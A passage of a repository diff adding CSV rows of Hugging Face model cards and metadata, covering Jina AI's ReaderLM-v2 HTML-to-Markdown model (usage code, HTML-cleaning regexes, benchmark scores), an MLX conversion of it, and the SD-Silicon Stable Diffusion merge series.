from transformers import AutoModelForCausalLM, AutoTokenizer
|
| 87 |
+
|
| 88 |
+
device = ""cuda"" # or ""cpu""
|
| 89 |
+
tokenizer = AutoTokenizer.from_pretrained(""jinaai/ReaderLM-v2"")
|
| 90 |
+
model = AutoModelForCausalLM.from_pretrained(""jinaai/ReaderLM-v2"").to(device)
|
| 91 |
+
```
|
| 92 |
+
|
| 93 |
+
3. (Optional) Pre-clean your HTML to remove scripts, styles, comments, to reduce the noise and length of the input:
|
| 94 |
+
|
| 95 |
+
```python
|
| 96 |
+
import re
|
| 97 |
+
|
| 98 |
+
# Patterns
|
| 99 |
+
SCRIPT_PATTERN = r""<[ ]*script.*?\/[ ]*script[ ]*>""
|
| 100 |
+
STYLE_PATTERN = r""<[ ]*style.*?\/[ ]*style[ ]*>""
|
| 101 |
+
META_PATTERN = r""<[ ]*meta.*?>""
|
| 102 |
+
COMMENT_PATTERN = r""<[ ]*!--.*?--[ ]*>""
|
| 103 |
+
LINK_PATTERN = r""<[ ]*link.*?>""
|
| 104 |
+
BASE64_IMG_PATTERN = r'<img[^>]+src=""data:image/[^;]+;base64,[^""]+""[^>]*>'
|
| 105 |
+
SVG_PATTERN = r""(<svg[^>]*>)(.*?)(<\/svg>)""
|
| 106 |
+
|
| 107 |
+
|
| 108 |
+
def replace_svg(html: str, new_content: str = ""this is a placeholder"") -> str:
|
| 109 |
+
return re.sub(
|
| 110 |
+
SVG_PATTERN,
|
| 111 |
+
lambda match: f""{match.group(1)}{new_content}{match.group(3)}"",
|
| 112 |
+
html,
|
| 113 |
+
flags=re.DOTALL,
|
| 114 |
+
)
|
| 115 |
+
|
| 116 |
+
|
| 117 |
+
def replace_base64_images(html: str, new_image_src: str = ""#"") -> str:
|
| 118 |
+
return re.sub(BASE64_IMG_PATTERN, f'<img src=""{new_image_src}""/>', html)
|
| 119 |
+
|
| 120 |
+
|
| 121 |
+
def clean_html(html: str, clean_svg: bool = False, clean_base64: bool = False):
|
| 122 |
+
html = re.sub(
|
| 123 |
+
SCRIPT_PATTERN, """", html, flags=re.IGNORECASE | re.MULTILINE | re.DOTALL
|
| 124 |
+
)
|
| 125 |
+
html = re.sub(
|
| 126 |
+
STYLE_PATTERN, """", html, flags=re.IGNORECASE | re.MULTILINE | re.DOTALL
|
| 127 |
+
)
|
| 128 |
+
html = re.sub(
|
| 129 |
+
META_PATTERN, """", html, flags=re.IGNORECASE | re.MULTILINE | re.DOTALL
|
| 130 |
+
)
|
| 131 |
+
html = re.sub(
|
| 132 |
+
COMMENT_PATTERN, """", html, flags=re.IGNORECASE | re.MULTILINE | re.DOTALL
|
| 133 |
+
)
|
| 134 |
+
html = re.sub(
|
| 135 |
+
LINK_PATTERN, """", html, flags=re.IGNORECASE | re.MULTILINE | re.DOTALL
|
| 136 |
+
)
|
| 137 |
+
|
| 138 |
+
if clean_svg:
|
| 139 |
+
html = replace_svg(html)
|
| 140 |
+
if clean_base64:
|
| 141 |
+
html = replace_base64_images(html)
|
| 142 |
+
return html
|
| 143 |
+
```
|
| 144 |
+
|
| 145 |
+
4. Create a prompt for the model:
|
| 146 |
+
|
| 147 |
+
```python
|
| 148 |
+
def create_prompt(
|
| 149 |
+
text: str, tokenizer=None, instruction: str = None, schema: str = None
|
| 150 |
+
) -> str:
|
| 151 |
+
""""""
|
| 152 |
+
Create a prompt for the model with optional instruction and JSON schema.
|
| 153 |
+
""""""
|
| 154 |
+
if not instruction:
|
| 155 |
+
instruction = ""Extract the main content from the given HTML and convert it to Markdown format.""
|
| 156 |
+
if schema:
|
| 157 |
+
instruction = ""Extract the specified information from a list of news threads and present it in a structured JSON format.""
|
| 158 |
+
prompt = f""{instruction}\n```html\n{text}\n```\nThe JSON schema is as follows:```json\n{schema}\n```""
|
| 159 |
+
else:
|
| 160 |
+
prompt = f""{instruction}\n```html\n{text}\n```""
|
| 161 |
+
|
| 162 |
+
messages = [
|
| 163 |
+
{
|
| 164 |
+
""role"": ""user"",
|
| 165 |
+
""content"": prompt,
|
| 166 |
+
}
|
| 167 |
+
]
|
| 168 |
+
|
| 169 |
+
return tokenizer.apply_chat_template(
|
| 170 |
+
messages, tokenize=False, add_generation_prompt=True
|
| 171 |
+
)
|
| 172 |
+
```
|
| 173 |
+
|
| 174 |
+
### HTML to Markdown Example
|
| 175 |
+
|
| 176 |
+
```python
|
| 177 |
+
html = ""<html><body><h1>Hello, world!</h1></body></html>""
|
| 178 |
+
|
| 179 |
+
html = clean_html(html)
|
| 180 |
+
|
| 181 |
+
input_prompt = create_prompt(html, tokenizer=tokenizer)
|
| 182 |
+
inputs = tokenizer.encode(input_prompt, return_tensors=""pt"").to(device)
|
| 183 |
+
outputs = model.generate(
|
| 184 |
+
inputs, max_new_tokens=1024, temperature=0, do_sample=False, repetition_penalty=1.08
|
| 185 |
+
)
|
| 186 |
+
|
| 187 |
+
print(tokenizer.decode(outputs[0]))
|
| 188 |
+
```
|
| 189 |
+
|
| 190 |
+
### HTML to JSON Example
|
| 191 |
+
|
| 192 |
+
```python
|
| 193 |
+
schema = """"""
|
| 194 |
+
{
|
| 195 |
+
""type"": ""object"",
|
| 196 |
+
""properties"": {
|
| 197 |
+
""title"": {
|
| 198 |
+
""type"": ""string""
|
| 199 |
+
},
|
| 200 |
+
""author"": {
|
| 201 |
+
""type"": ""string""
|
| 202 |
+
},
|
| 203 |
+
""date"": {
|
| 204 |
+
""type"": ""string""
|
| 205 |
+
},
|
| 206 |
+
""content"": {
|
| 207 |
+
""type"": ""string""
|
| 208 |
+
}
|
| 209 |
+
},
|
| 210 |
+
""required"": [""title"", ""author"", ""date"", ""content""]
|
| 211 |
+
}
|
| 212 |
+
""""""
|
| 213 |
+
|
| 214 |
+
html = clean_html(html)
|
| 215 |
+
input_prompt = create_prompt(html, tokenizer=tokenizer, schema=schema)
|
| 216 |
+
|
| 217 |
+
inputs = tokenizer.encode(input_prompt, return_tensors=""pt"").to(device)
|
| 218 |
+
outputs = model.generate(
|
| 219 |
+
inputs, max_new_tokens=1024, temperature=0, do_sample=False, repetition_penalty=1.08
|
| 220 |
+
)
|
| 221 |
+
|
| 222 |
+
print(tokenizer.decode(outputs[0]))
|
| 223 |
+
```
|
| 224 |
+
|
| 225 |
+
## Model Performance
|
| 226 |
+
|
| 227 |
+
ReaderLM-v2 has been extensively evaluated on various tasks:
|
| 228 |
+
|
| 229 |
+
### Quantitative Evaluation
|
| 230 |
+
|
| 231 |
+
For HTML-to-Markdown tasks, the model outperforms much larger models like Qwen2.5-32B-Instruct and Gemini2-flash-expr, achieving:
|
| 232 |
+
- ROUGE-L: 0.84
|
| 233 |
+
- Levenshtein Distance: 0.22
|
| 234 |
+
- Jaro-Winkler Similarity: 0.82
|
| 235 |
+
|
| 236 |
+
For HTML-to-JSON tasks, it shows competitive performance with:
|
| 237 |
+
- F1 Score: 0.81
|
| 238 |
+
- Precision: 0.82
|
| 239 |
+
- Recall: 0.81
|
| 240 |
+
- Pass-Rate: 0.98
|
| 241 |
+
|
| 242 |
+
### Qualitative Evaluation
|
| 243 |
+
|
| 244 |
+
The model excels in three key dimensions:
|
| 245 |
+
- Content Integrity: 39/50
|
| 246 |
+
- Structural Accuracy: 35/50
|
| 247 |
+
- Format Compliance: 36/50
|
| 248 |
+
|
| 249 |
+
These scores demonstrate strong performance in preserving semantic information, maintaining structural accuracy, and adhering to markdown syntax standards.
|
| 250 |
+
|
| 251 |
+
## Training Details
|
| 252 |
+
|
| 253 |
+
ReaderLM-v2 is built on Qwen2.5-1.5B-Instruction and trained using a sophisticated pipeline:
|
| 254 |
+
|
| 255 |
+
1. Data Preparation: Created html-markdown-1m dataset with 1 million HTML documents
|
| 256 |
+
2. Synthetic Data Generation: Three-step pipeline using Qwen2.5-32B-Instruction
|
| 257 |
+
- Drafting: Initial markdown and JSON generation
|
| 258 |
+
- Refinement: Content cleanup and structure alignment
|
| 259 |
+
- Critique: Quality evaluation and filtering
|
| 260 |
+
|
| 261 |
+
3. Training Process:
|
| 262 |
+
- Long-context pretraining
|
| 263 |
+
- Supervised fine-tuning
|
| 264 |
+
- Direct preference optimization
|
| 265 |
+
- Self-play reinforcement tuning","{""id"": ""jinaai/ReaderLM-v2"", ""author"": ""jinaai"", ""sha"": ""1d07078459ee1e880a22d67387b5e683d50a6e4b"", ""last_modified"": ""2025-03-04 06:52:36+00:00"", ""created_at"": ""2025-01-13 02:44:23+00:00"", ""private"": false, ""gated"": false, ""disabled"": false, ""downloads"": 69284, ""downloads_all_time"": null, ""likes"": 615, ""library_name"": ""transformers"", ""gguf"": null, ""inference"": null, ""inference_provider_mapping"": null, ""tags"": [""transformers"", ""onnx"", ""safetensors"", ""qwen2"", ""text-generation"", ""conversational"", ""multilingual"", ""arxiv:2503.01151"", ""license:cc-by-nc-4.0"", ""autotrain_compatible"", ""text-generation-inference"", ""region:eu""], ""pipeline_tag"": ""text-generation"", ""mask_token"": null, ""trending_score"": null, ""card_data"": ""language:\n- multilingual\nlibrary_name: transformers\nlicense: cc-by-nc-4.0\npipeline_tag: text-generation\ninference: false"", ""widget_data"": null, ""model_index"": null, ""config"": {""architectures"": [""Qwen2ForCausalLM""], ""model_type"": ""qwen2"", ""tokenizer_config"": {""bos_token"": null, ""chat_template"": ""{% for message in messages %}{% if loop.first and messages[0]['role'] != 'system' %}{{ '<|im_start|>system\nYou are an AI assistant developed by Jina AI.<|im_end|>\n' }}{% endif %}{{'<|im_start|>' + message['role'] + '\n' + message['content'] + '<|im_end|>' + '\n' }}{% endfor %}{% if add_generation_prompt %}{{ '<|im_start|>assistant\n' }}{% endif %}"", ""eos_token"": ""<|im_end|>"", ""pad_token"": ""<|endoftext|>"", ""unk_token"": null}}, ""transformers_info"": {""auto_model"": ""AutoModelForCausalLM"", ""custom_class"": null, ""pipeline_tag"": ""text-generation"", ""processor"": ""AutoTokenizer""}, ""siblings"": [""RepoSibling(rfilename='.gitattributes', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='README.md', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='added_tokens.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='config.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='generation_config.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='merges.txt', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='model.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='onnx/model.onnx', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='onnx/model.onnx_data', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='onnx/model_bnb4.onnx', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='onnx/model_fp16.onnx', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='onnx/model_fp16.onnx_data', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='onnx/model_int8.onnx', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='onnx/model_q4.onnx', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='onnx/model_q4f16.onnx', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='onnx/model_quantized.onnx', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='onnx/model_uint8.onnx', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='special_tokens_map.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='tokenizer.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='tokenizer_config.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='vocab.json', size=None, blob_id=None, lfs=None)""], ""spaces"": [""KBaba7/Quant"", ""bhaskartripathi/LLM_Quantization"", ""totolook/Quant"", ""FallnAI/Quantize-HF-Models"", ""ruslanmv/convert_to_gguf"", ""Felguk/ReaderLM-v2"", ""Nymbo/Markdown-Studio"", ""kevcx2/jinaai-ReaderLM-v2"", ""K00B404/LLM_Quantization"", ""Alun6666/jinaai-ReaderLM-v2"", ""agideia/jinaai-ReaderLM-v2""], ""safetensors"": {""parameters"": {""BF16"": 1543714304}, ""total"": 1543714304}, ""security_repo_status"": null, ""xet_enabled"": null, ""lastModified"": ""2025-03-04 06:52:36+00:00"", ""cardData"": ""language:\n- multilingual\nlibrary_name: transformers\nlicense: cc-by-nc-4.0\npipeline_tag: text-generation\ninference: false"", ""transformersInfo"": {""auto_model"": ""AutoModelForCausalLM"", ""custom_class"": null, ""pipeline_tag"": ""text-generation"", ""processor"": ""AutoTokenizer""}, ""_id"": ""67847e071ceb7569fc09eb5f"", ""modelId"": ""jinaai/ReaderLM-v2"", ""usedStorage"": 31852785268}",0,https://huggingface.co/alexgusevski/ReaderLM-v2-mlx,1,,0,"https://huggingface.co/mlx-community/jinaai-ReaderLM-v2, https://huggingface.co/fdgsgqaegt/ReaderLM-v2-Q4_K_M-GGUF, https://huggingface.co/Svngoku/ReaderLM-v2-Q8_0-GGUF, https://huggingface.co/mradermacher/ReaderLM-v2-GGUF, https://huggingface.co/adriabama06/ReaderLM-v2-AWQ, https://huggingface.co/adriabama06/ReaderLM-v2-GPTQ-8bit, https://huggingface.co/Emm9625/ReaderLM-v2-Q3_K_L-GGUF, https://huggingface.co/Emm9625/ReaderLM-v2-Q6_K-GGUF, https://huggingface.co/roleplaiapp/ReaderLM-v2-Q2_K-GGUF, https://huggingface.co/roleplaiapp/ReaderLM-v2-Q3_K_S-GGUF, https://huggingface.co/roleplaiapp/ReaderLM-v2-Q3_K_M-GGUF, https://huggingface.co/roleplaiapp/ReaderLM-v2-Q3_K_L-GGUF, https://huggingface.co/roleplaiapp/ReaderLM-v2-Q4_0-GGUF, https://huggingface.co/roleplaiapp/ReaderLM-v2-Q4_K_S-GGUF, https://huggingface.co/roleplaiapp/ReaderLM-v2-Q4_K_M-GGUF, https://huggingface.co/roleplaiapp/ReaderLM-v2-Q5_0-GGUF, https://huggingface.co/roleplaiapp/ReaderLM-v2-Q5_K_S-GGUF, https://huggingface.co/roleplaiapp/ReaderLM-v2-Q5_K_M-GGUF, https://huggingface.co/roleplaiapp/ReaderLM-v2-Q6_K-GGUF, https://huggingface.co/roleplaiapp/ReaderLM-v2-Q8_0-GGUF, https://huggingface.co/yasserrmd/ReaderLM-v2-gguf, https://huggingface.co/ysn-rfd/ReaderLM-v2-Q8_0-GGUF, https://huggingface.co/DevQuasar/jinaai.ReaderLM-v2-GGUF, https://huggingface.co/mradermacher/ReaderLM-v2-i1-GGUF, https://huggingface.co/PrunaAI/jinaai-ReaderLM-v2-GGUF-smashed, https://huggingface.co/alexgusevski/ReaderLM-v2-q3-mlx, https://huggingface.co/alexgusevski/ReaderLM-v2-q4-mlx, https://huggingface.co/alexgusevski/ReaderLM-v2-q6-mlx, https://huggingface.co/alexgusevski/ReaderLM-v2-q8-mlx, https://huggingface.co/matrixportal/ReaderLM-v2-GGUF, https://huggingface.co/ysn-rfd/ReaderLM-v2-GGUF",31,"https://huggingface.co/kunal732/QwenReader, https://huggingface.co/kunal732/qwenreader-m2, https://huggingface.co/kunal732/qwenreader3, https://huggingface.co/kunal732/qwenreader4",4,"Alun6666/jinaai-ReaderLM-v2, FallnAI/Quantize-HF-Models, Felguk/ReaderLM-v2, K00B404/LLM_Quantization, KBaba7/Quant, Nymbo/Markdown-Studio, agideia/jinaai-ReaderLM-v2, bhaskartripathi/LLM_Quantization, huggingface/InferenceSupport/discussions/new?title=jinaai/ReaderLM-v2&description=React%20to%20this%20comment%20with%20an%20emoji%20to%20vote%20for%20%5Bjinaai%2FReaderLM-v2%5D(%2Fjinaai%2FReaderLM-v2)%20to%20be%20supported%20by%20Inference%20Providers.%0A%0A(optional)%20Which%20providers%20are%20you%20interested%20in%3F%20(Novita%2C%20Hyperbolic%2C%20Together%E2%80%A6)%0A, kevcx2/jinaai-ReaderLM-v2, ruslanmv/convert_to_gguf, totolook/Quant",12
|
| 266 |
+
alexgusevski/ReaderLM-v2-mlx,"---
|
| 267 |
+
pipeline_tag: text-generation
|
| 268 |
+
language:
|
| 269 |
+
- multilingual
|
| 270 |
+
inference: false
|
| 271 |
+
license: cc-by-nc-4.0
|
| 272 |
+
library_name: transformers
|
| 273 |
+
base_model: jinaai/ReaderLM-v2
|
| 274 |
+
tags:
|
| 275 |
+
- mlx
|
| 276 |
+
---
|
| 277 |
+
|
| 278 |
+
# alexgusevski/ReaderLM-v2-mlx
|
| 279 |
+
|
| 280 |
+
The Model [alexgusevski/ReaderLM-v2-mlx](https://huggingface.co/alexgusevski/ReaderLM-v2-mlx) was
|
| 281 |
+
converted to MLX format from [jinaai/ReaderLM-v2](https://huggingface.co/jinaai/ReaderLM-v2)
|
| 282 |
+
using mlx-lm version **0.21.4**.
|
| 283 |
+
|
| 284 |
+
## Use with mlx
|
| 285 |
+
|
| 286 |
+
```bash
|
| 287 |
+
pip install mlx-lm
|
| 288 |
+
```
|
| 289 |
+
|
| 290 |
+
```python
|
| 291 |
+
from mlx_lm import load, generate
|
| 292 |
+
|
| 293 |
+
model, tokenizer = load(""alexgusevski/ReaderLM-v2-mlx"")
|
| 294 |
+
|
| 295 |
+
prompt = ""hello""
|
| 296 |
+
|
| 297 |
+
if tokenizer.chat_template is not None:
|
| 298 |
+
messages = [{""role"": ""user"", ""content"": prompt}]
|
| 299 |
+
prompt = tokenizer.apply_chat_template(
|
| 300 |
+
messages, add_generation_prompt=True
|
| 301 |
+
)
|
| 302 |
+
|
| 303 |
+
response = generate(model, tokenizer, prompt=prompt, verbose=True)
|
| 304 |
+
```
|
| 305 |
+
","{""id"": ""alexgusevski/ReaderLM-v2-mlx"", ""author"": ""alexgusevski"", ""sha"": ""d4ec67dfcf82838a77aaa2e2e256316d6d3f5d54"", ""last_modified"": ""2025-02-24 18:14:25+00:00"", ""created_at"": ""2025-02-24 18:02:47+00:00"", ""private"": false, ""gated"": false, ""disabled"": false, ""downloads"": 13, ""downloads_all_time"": null, ""likes"": 1, ""library_name"": ""transformers"", ""gguf"": null, ""inference"": null, ""inference_provider_mapping"": null, ""tags"": [""transformers"", ""safetensors"", ""qwen2"", ""text-generation"", ""mlx"", ""conversational"", ""multilingual"", ""base_model:jinaai/ReaderLM-v2"", ""base_model:finetune:jinaai/ReaderLM-v2"", ""license:cc-by-nc-4.0"", ""autotrain_compatible"", ""text-generation-inference"", ""region:us""], ""pipeline_tag"": ""text-generation"", ""mask_token"": null, ""trending_score"": null, ""card_data"": ""base_model: jinaai/ReaderLM-v2\nlanguage:\n- multilingual\nlibrary_name: transformers\nlicense: cc-by-nc-4.0\npipeline_tag: text-generation\ntags:\n- mlx\ninference: false"", ""widget_data"": null, ""model_index"": null, ""config"": {""architectures"": [""Qwen2ForCausalLM""], ""model_type"": ""qwen2"", ""tokenizer_config"": {""bos_token"": null, ""chat_template"": ""{% for message in messages %}{% if loop.first and messages[0]['role'] != 'system' %}{{ '<|im_start|>system\nYou are an AI assistant developed by Jina AI.<|im_end|>\n' }}{% endif %}{{'<|im_start|>' + message['role'] + '\n' + message['content'] + '<|im_end|>' + '\n' }}{% endfor %}{% if add_generation_prompt %}{{ '<|im_start|>assistant\n' }}{% endif %}"", ""eos_token"": ""<|im_end|>"", ""pad_token"": ""<|endoftext|>"", ""unk_token"": null}}, ""transformers_info"": {""auto_model"": ""AutoModelForCausalLM"", ""custom_class"": null, ""pipeline_tag"": ""text-generation"", ""processor"": ""AutoTokenizer""}, ""siblings"": [""RepoSibling(rfilename='.gitattributes', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='README.md', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='added_tokens.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='config.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='merges.txt', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='model.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='model.safetensors.index.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='special_tokens_map.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='tokenizer.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='tokenizer_config.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='vocab.json', size=None, blob_id=None, lfs=None)""], ""spaces"": [], ""safetensors"": {""parameters"": {""F16"": 1543714304}, ""total"": 1543714304}, ""security_repo_status"": null, ""xet_enabled"": null, ""lastModified"": ""2025-02-24 18:14:25+00:00"", ""cardData"": ""base_model: jinaai/ReaderLM-v2\nlanguage:\n- multilingual\nlibrary_name: transformers\nlicense: cc-by-nc-4.0\npipeline_tag: text-generation\ntags:\n- mlx\ninference: false"", ""transformersInfo"": {""auto_model"": ""AutoModelForCausalLM"", ""custom_class"": null, ""pipeline_tag"": ""text-generation"", ""processor"": ""AutoTokenizer""}, ""_id"": ""67bcb447efd8d2373026aa71"", ""modelId"": ""alexgusevski/ReaderLM-v2-mlx"", ""usedStorage"": 3098888563}",1,,0,,0,,0,,0,huggingface/InferenceSupport/discussions/new?title=alexgusevski/ReaderLM-v2-mlx&description=React%20to%20this%20comment%20with%20an%20emoji%20to%20vote%20for%20%5Balexgusevski%2FReaderLM-v2-mlx%5D(%2Falexgusevski%2FReaderLM-v2-mlx)%20to%20be%20supported%20by%20Inference%20Providers.%0A%0A(optional)%20Which%20providers%20are%20you%20interested%20in%3F%20(Novita%2C%20Hyperbolic%2C%20Together%E2%80%A6)%0A,1
|
SD-Silicon_finetunes_20250427_003734.csv_finetunes_20250427_003734.csv
ADDED
|
@@ -0,0 +1,90 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| 1 |
+
model_id,card,metadata,depth,children,children_count,adapters,adapters_count,quantized,quantized_count,merges,merges_count,spaces,spaces_count
|
| 2 |
+
Xynon/SD-Silicon,"---
|
| 3 |
+
license: creativeml-openrail-m
|
| 4 |
+
tags:
|
| 5 |
+
- stable-diffusion
|
| 6 |
+
- text-to-image
|
| 7 |
+
- safetensors
|
| 8 |
+
---
|
| 9 |
+
|
| 10 |
+
----
|
| 11 |
+
|
| 12 |
+
# SD-Silicon
|
| 13 |
+
|
| 14 |
+
SD-Silicon: A series of general-purpose models based off the experimental automerger, autoMBW.
|
| 15 |
+
|
| 16 |
+
A collaborative creation of Xerxemi#6423 & Xynon#7407.
|
| 17 |
+
|
| 18 |
+

|
| 19 |
+
|
| 20 |
+
All models listed have baked WD1.3 VAE. However, for the purposes of this model series, external VAE is also recommended.
|
| 21 |
+
|
| 22 |
+
----
|
| 23 |
+
|
| 24 |
+
# Licence
|
| 25 |
+
|
| 26 |
+
This model is open access and available to all, with a CreativeML OpenRAIL-M license further specifying rights and usage. The CreativeML OpenRAIL License specifies:
|
| 27 |
+
1. You can't use the model to deliberately produce nor share illegal or harmful outputs or content
|
| 28 |
+
2. The authors claims no rights on the outputs you generate, you are free to use them and are accountable for their use which must not go against the provisions set in the license
|
| 29 |
+
3. You may re-distribute the weights and use the model commercially and/or as a service. If you do, please be aware you have to include the same use restrictions as the ones in the license and share a copy of the CreativeML OpenRAIL-M to all your users (please read the license entirely and carefully) Please read the full license here :https://huggingface.co/spaces/CompVis/stable-diffusion-license
|
| 30 |
+
|
| 31 |
+
# Terms of use
|
| 32 |
+
|
| 33 |
+
- **Clearly indicate where modifications have been made.**
|
| 34 |
+
If you used it for merging, please state what steps you took to do so.
|
| 35 |
+
|
| 36 |
+
----
|
| 37 |
+
|
| 38 |
+
# --base models--
|
| 39 |
+
|
| 40 |
+
Silicon28: a.k.a. extestg4. The first model of autoMBW to match/surpass quality of manual merge block weight merges.
|
| 41 |
+
|
| 42 |
+
Silicon29: a.k.a. extesto4. a similar, but much larger list of merges based off the list of Silicon28. First good model to be constructed on a semi-stabilized autoMBW codebase.
|
| 43 |
+
|
| 44 |
+
# --specialty models--
|
| 45 |
+
|
| 46 |
+
Silicon28-negzero: a.k.a. extestg4-negzero. A negatively finetuned version of Silicon28 for 10 epochs off a dataset of 3990 images. Better at some, worse at others.
|
| 47 |
+
|
| 48 |
+
Silicon29-dark: a.k.a. extesto4-dark. Silicon29, but merged with noise offset. Gives darker output than the original base.
|
| 49 |
+
|
| 50 |
+
# --future models--
|
| 51 |
+
|
| 52 |
+
More will be posted soon<sup>TM</sup>
|
| 53 |
+
|
| 54 |
+
----
|
| 55 |
+
|
| 56 |
+
# Recommended Settings
|
| 57 |
+
|
| 58 |
+
Sampler: DPM++ 2M
|
| 59 |
+
|
| 60 |
+
Steps: 42 + 42 | can probably go lower, I just run at this
|
| 61 |
+
|
| 62 |
+
Upscaler: Latent (bicubic antialiased)
|
| 63 |
+
|
| 64 |
+
Denoising: ~0.5 to ~0.6
|
| 65 |
+
|
| 66 |
+
CFG: 13
|
| 67 |
+
|
| 68 |
+
----
|
| 69 |
+
|
| 70 |
+
more comparisons here: https://medium.com/@media_97267/the-automated-stable-diffusion-checkpoint-merger-autombw-44f8dfd38871
|
| 71 |
+
|
| 72 |
+
Note: all comparison photos are pure Silicon29 with the latent bicubic antialiased upscaler.
|
| 73 |
+
|
| 74 |
+

|
| 75 |
+

|
| 76 |
+

|
| 77 |
+

|
| 78 |
+
|
| 79 |
+
----
|
| 80 |
+
|
| 81 |
+
# Q: Why is this named Silicon?
|
| 82 |
+
|
| 83 |
+
A: Silicon's atomic number is 14. This line of models was originally supposed to be the 14th experimental model in Xynon/models, a.k.a. experimental14a/b/c.
|
| 84 |
+
|
| 85 |
+
# Q: Where do I find the automerger used to make these models?
|
| 86 |
+
|
| 87 |
+
A: https://github.com/Xerxemi/sdweb-auto-MBW | preliminary article here: https://medium.com/@media_97267/the-automated-stable-diffusion-checkpoint-merger-autombw-44f8dfd38871
|
| 88 |
+
|
| 89 |
+
----
|
| 90 |
+
","{""id"": ""Xynon/SD-Silicon"", ""author"": ""Xynon"", ""sha"": ""248976c6a1b70526b9faebaa197ee04104bc56ef"", ""last_modified"": ""2023-02-28 07:21:59+00:00"", ""created_at"": ""2023-02-24 04:31:48+00:00"", ""private"": false, ""gated"": false, ""disabled"": false, ""downloads"": 0, ""downloads_all_time"": null, ""likes"": 178, ""library_name"": null, ""gguf"": null, ""inference"": null, ""inference_provider_mapping"": null, ""tags"": [""stable-diffusion"", ""text-to-image"", ""safetensors"", ""license:creativeml-openrail-m"", ""region:us""], ""pipeline_tag"": ""text-to-image"", ""mask_token"": null, ""trending_score"": null, ""card_data"": ""license: creativeml-openrail-m\ntags:\n- stable-diffusion\n- text-to-image\n- safetensors"", ""widget_data"": null, ""model_index"": null, ""config"": null, ""transformers_info"": null, ""siblings"": [""RepoSibling(rfilename='.gitattributes', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='README.md', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Silicon28/Silicon28-negzero.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Silicon28/Silicon28.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Silicon29/Silicon29-dark.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='Silicon29/Silicon29.safetensors', size=None, blob_id=None, lfs=None)""], ""spaces"": [], ""safetensors"": null, ""security_repo_status"": null, ""xet_enabled"": null, ""lastModified"": ""2023-02-28 07:21:59+00:00"", ""cardData"": ""license: creativeml-openrail-m\ntags:\n- stable-diffusion\n- text-to-image\n- safetensors"", ""transformersInfo"": null, ""_id"": ""63f83db4a6db61fe73691847"", ""modelId"": ""Xynon/SD-Silicon"", ""usedStorage"": 8530504377}",0,,0,,0,,0,,0,"CompVis/stable-diffusion-license, huggingface/InferenceSupport/discussions/new?title=Xynon/SD-Silicon&description=React%20to%20this%20comment%20with%20an%20emoji%20to%20vote%20for%20%5BXynon%2FSD-Silicon%5D(%2FXynon%2FSD-Silicon)%20to%20be%20supported%20by%20Inference%20Providers.%0A%0A(optional)%20Which%20providers%20are%20you%20interested%20in%3F%20(Novita%2C%20Hyperbolic%2C%20Together%E2%80%A6)%0A",2
|
Step-Audio-TTS-3B_finetunes_20250427_003734.csv_finetunes_20250427_003734.csv
ADDED
|
@@ -0,0 +1,164 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
